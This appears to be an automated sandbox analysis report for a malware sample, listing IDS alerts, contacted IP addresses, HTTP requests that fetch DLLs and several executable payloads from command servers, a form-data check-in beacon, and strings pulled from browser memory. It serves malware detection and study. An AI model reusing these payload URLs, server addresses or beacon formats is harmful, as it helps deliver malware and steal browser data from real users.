0d 0a Data Ascii: ------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="hwid"AA9A9ACB72684217651120------BFCFBFBFBKFIDHJKFCAFContent-Disposition: form-data; name="build"drum------BFCFBFBFBKFIDHJKFCAF--
                          Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                          Source: Joe Sandbox ViewIP Address: 34.117.188.166 34.117.188.166
                          Source: Joe Sandbox ViewIP Address: 31.41.244.11 31.41.244.11
                          Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Joe Sandbox ViewJA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49714 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49800 -> 2.20.60.64:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49809 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49866 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49923 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49945 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49947 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49952 -> 172.67.181.44:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49970 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49991 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50002 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50012 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50018 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50032 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50054 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50069 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50068 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50082 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50084 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50089 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50083 -> 172.67.165.166:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50088 -> 172.67.165.166:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CA8CC60 PR_Recv,0_2_6CA8CC60
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/rhnew.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub= HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 92.63.197.221Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F940970000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3447477708.000001F93FC03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UpdateService:_selectAndInstallUpdate - update not supported for this system. Notifying observers. topic: update-available, status: unsupportedhttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/AND bookmarked equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php*https://ads.stickyadstv.com/firefox-etp*://pixel.advertising.com/firefox-etpextensions.webextensions.warnings-as-errors equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F9409F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3532560514.000001F944897000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3530700311.000001F9445DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3532560514.000001F944807000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContentUpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContentUpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94470A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F944703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", 